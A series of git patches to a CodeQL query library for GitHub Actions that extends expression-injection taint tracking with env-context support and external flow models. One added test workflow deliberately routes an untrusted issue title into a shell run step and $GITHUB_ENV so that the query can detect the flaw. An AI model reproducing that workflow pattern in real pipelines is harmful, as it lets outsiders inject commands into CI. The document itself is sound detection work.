b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -15,9 +15,13 @@ import actions import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + sinkNode(this, "expression-injection") + } } private module MyConfig implements DataFlow::ConfigSig { From 4f0b66ea0381f849682efecfb66dcea47652ba18 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 13:47:44 +0100 Subject: [PATCH 019/707] Refactor MaD semantics --- ql/lib/codeql/actions/Ast.qll | 51 ++++++++++++++++--- .../codeql/actions/dataflow/ExternalFlow.qll | 20 ++++++-- .../codeql/actions/dataflow/FlowSources.qll | 25 +++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 22 ++++++-- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/REMOVEME.model.yml | 6 +++ .../frabert-replace-string-action.model.yml | 7 +++ ...-actions-find-and-replace-string.model.yml | 9 ++++ ql/lib/ext/sinks.model.yml | 11 ---- ql/lib/ext/sources.model.yml | 11 ---- ql/lib/ext/summaries.model.yml | 19 ------- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ++++++++++ 12 files changed, 153 insertions(+), 60 deletions(-) create mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/frabert-replace-string-action.model.yml create mode 100644 ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml delete mode 100644 ql/lib/ext/sinks.model.yml delete mode 100644 ql/lib/ext/sources.model.yml delete mode 100644 ql/lib/ext/summaries.model.yml create mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a25ef856233b..697f28b54a2f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -115,6 +115,9 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } + /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -181,6 +184,26 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -192,6 +215,8 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); + + abstract Expression getEnvExpr(string name); } /** @@ -212,6 +237,8 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } + + override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } } /** @@ -260,6 +287,23 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + override Expression getEnvExpr(string name) { + this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -272,13 +316,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } - string getScript() { result = scriptExpr.getValue() } } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6e02e4036ba3..b19fbcbaca6d 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,8 +3,8 @@ import codeql.actions.DataFlow import actions /** Holds if a source model exists for the given parameters. */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string trigger, string kind) { + Extensions::sourceModel(action, version, output, trigger, kind) } /** Holds if a sink model exists for the given parameters. */ @@ -17,15 +17,27 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } +/** + * MaD sinks + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: sink node (prefixed with either `env.` or `input.`) + * - kind: sink kind + */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | - uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + ( + if input.trim().matches("env.%") + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) + else sink.asExpr() = uses.getArgumentExpr(input.trim()) + ) and sinkModel(action, version, input, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() ) ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3bde829321fe..120444863e55 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -125,19 +125,36 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ private class ExternallyDefinedSource extends RemoteFlowSource { string soutceType; ExternallyDefinedSource() { - exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | - sourceModel(action, version, _, kind) and + exists( + UsesExpr uses, string action, string version, string output, string trigger, string kind + | + sourceModel(action, version, output, trigger, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if output.trim().matches("env.%") + then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) + else + // 'output.' is the default qualifier + // TODO: Taint just the specified output + this.asExpr() = uses ) and - uses = this.asExpr() and soutceType = kind ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e5fa04427ccf..95566aee96cc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,16 +21,32 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr uses, string action, string version, string input | - /*, string output */ summaryModel(action, version, input, _, "taint") and + // `output` not used yet + summaryModel(action, version, input, _, "taint") and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) ) and - pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and succ.asExpr() = uses ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de02616..93ec64b059e5 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,7 +5,9 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string trigger, string kind +); /** * Holds if a summary model exists for the given parameters. diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml new file mode 100644 index 000000000000..b21aa207bb25 --- /dev/null +++ b/ql/lib/ext/REMOVEME.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert-replace-string-action.model.yml new file mode 100644 index 000000000000..e211fe2b69c7 --- /dev/null +++ b/ql/lib/ext/frabert-replace-string-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml new file mode 100644 index 000000000000..28517f445682 --- /dev/null +++ b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml deleted file mode 100644 index e28ec39d1bee..000000000000 --- a/ql/lib/ext/sinks.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ - "FAKE-mad9000/actions-find-and-replace-string", - "*", - "source", - "expression-injection", - ] diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml deleted file mode 100644 index 666a5532865e..000000000000 --- a/ql/lib/ext/sources.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ - "tj-actions/changed-files", - "v10, v20, v30, v40", - "all_changed_file", - "PR", - ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml deleted file mode 100644 index cc8e2df5fe9e..000000000000 --- a/ql/lib/ext/summaries.model.yml +++ /dev/null @@ -1,19 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: summaryModel - data: - - [ - "mad9000/actions-find-and-replace-string", - "*", - "source, replace", - "value", - "taint", - ] - - [ - "frabert/replace-string-action", - "*", - "string, replace-with", - "replaced", - "taint", - ] diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml new file mode 100644 index 000000000000..a3f687a0611c --- /dev/null +++ b/ql/lib/ext/tj-actions-changed-files.model.yml @@ -0,0 +1,28 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ] From 4b57cee300fba6fa9a7268a9a88a4fe402a75f03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:12:36 +0100 Subject: [PATCH 020/707] Initial implementaion of env context support --- ql/lib/codeql/actions/Ast.qll | 48 ++++++++------ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 5 +- .../dataflow/internal/DataFlowPrivate.qll | 63 +++++++++++-------- .../.github/workflows/argus_case_study.yml | 29 +++++++++ 4 files changed, 100 insertions(+), 45 deletions(-) create mode 100644 ql/src/test/.github/workflows/argus_case_study.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 697f28b54a2f..ec05fa309d34 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -330,11 +330,14 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } + + abstract Expression getRefExpr(); } /** - * A ExprAccessExpr where the expression evaluated is a step output read. - * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + * Holds for an ExprAccessExpr accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { string stepId; @@ -347,17 +350,16 @@ class StepOutputAccessExpr extends ExprAccessExpr { this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) } - string getStepId() { result = stepId } - - string getVarName() { result = varName } - - StepStmt getStepStmt() { result.getId() = stepId } + override Expression getRefExpr() { + this.getJobStmt() = result.(StepStmt).getJobStmt() and + result.(StepStmt).getId() = stepId + } } /** - * A ExprAccessExpr where the expression evaluated is a job output read. - * eg: `${{ needs.job1.outputs.foo}}` - * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; @@ -372,9 +374,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } - string getVarName() { result = varName } - - Expression getOutputExpr() { + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -391,8 +391,9 @@ class JobOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. - * eg: `${{ inputs.foo}}` + * Holds for an ExprAccessExpr accesing the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` */ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { string paramName; @@ -401,12 +402,23 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } - string getParamName() { result = paramName } - - Expression getInputExpr() { + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) } } + +/** + * Holds for an ExprAccessExpr accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvAccessExpr extends ExprAccessExpr { + string varName; + + EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + + override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 95566aee96cc..cafd60832760 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -81,7 +81,10 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and - line.regexpMatch(".*::set-output\\s+name.*") and + ( + line.regexpMatch(".*::set-output\\s+name.*") or + line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 76495e3f80ca..ee59e25ab20a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -164,41 +164,52 @@ class ArgumentPosition extends string { */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() +/** + * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * e.g. ${{ steps.step1.output.foo }} + */ +predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(StepStmt astFrom, StepOutputAccessExpr astTo | + (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } -predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(RunExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() +/** + * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself + * e.g. ${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + */ +predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, JobOutputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } -predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression - exists(Expression astFrom, JobOutputAccessExpr astTo | +/** + * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * e.g. ${{ inputs.foo }} + */ +predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getOutputExpr() = astFrom + astTo.getRefExpr() = astFrom ) } -predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression - exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | +/** + * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself + * e.g. ${{ env.foo }} + */ +predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, EnvAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getInputExpr() = astFrom + astTo.getRefExpr() = astFrom ) } @@ -209,10 +220,10 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) + stepsCtxLocalStep(nodeFrom, nodeTo) or + jobsCtxLocalStep(nodeFrom, nodeTo) or + inputsCtxLocalStep(nodeFrom, nodeTo) or + envCtxLocalStep(nodeFrom, nodeTo) } /** diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/src/test/.github/workflows/argus_case_study.yml new file mode 100644 index 000000000000..7b9c57354882 --- /dev/null +++ b/ql/src/test/.github/workflows/argus_case_study.yml @@ -0,0 +1,29 @@ +name: Issue Workflow + +on: + issues: + types: [opened, edited] + +jobs: + redirectIssue: + runs-on: ubuntu-latest + name: Check for issue transfer + env: + content_analysis_response: undefined + steps: + - uses: actions/checkout@v2 + - name: Remove conflicting chars + env: + ISSUE_TITLE: ${{github.event.issue.title}} + uses: frabert/replace-string-action@1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: "-" + - name: Check info + id: check-info + run: | + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + + From 99358c62e2e1a252a9e38dfdab8d51bb3d43a499 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:47:27 +0100 Subject: [PATCH 021/707] Extend CFG to reach env expressions --- ql/lib/codeql/actions/Ast.qll | 68 +++++++++++++------ .../actions/controlflow/internal/Cfg.qll | 6 +- ql/lib/test/test.ql | 14 +--- 3 files changed, 53 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ec05fa309d34..61f2d8e91d76 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -184,26 +184,6 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -238,7 +218,25 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) } - override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + override Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -317,6 +315,26 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -420,5 +438,11 @@ class EnvAccessExpr extends ExprAccessExpr { EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } - override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } + override Expression getRefExpr() { + exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(RunExpr s | s.getEnvExpr(varName) = result) + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 9129ee5dc617..0dd34ff926f8 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -227,7 +227,8 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by @@ -240,7 +241,8 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index fe76852fa537..36c268ecc99d 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -31,10 +31,6 @@ query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNod query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } -query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) { - id = va.getStepId() and var = va.getVarName() -} - query predicate orphanVarAccesses(ExprAccessExpr va, string var) { var = va.getExpression() and not exists(AstNode n | n = va.getParentNode()) @@ -53,25 +49,21 @@ query predicate cfgNodes(Cfg::Node n) { } query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "simple1.yml" + e.getLocation().getFile().getBaseName() = "argus_case_study.yml" } query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } - query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } -query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } - query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string trigger, string kind) { + sourceModel(action, version, output, trigger, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { From e9707af38df5af35813eb01dd4fa70d7bbcb1eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 22:55:58 +0100 Subject: [PATCH 022/707] feat: support for composite action's analysis --- ql/lib/codeql/actions/Ast.qll | 88 ++++++++++--------- .../actions/controlflow/internal/Cfg.qll | 44 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 9 +- .../dataflow/internal/DataFlowPublic.qll | 7 +- ql/lib/test/test.ql | 2 +- 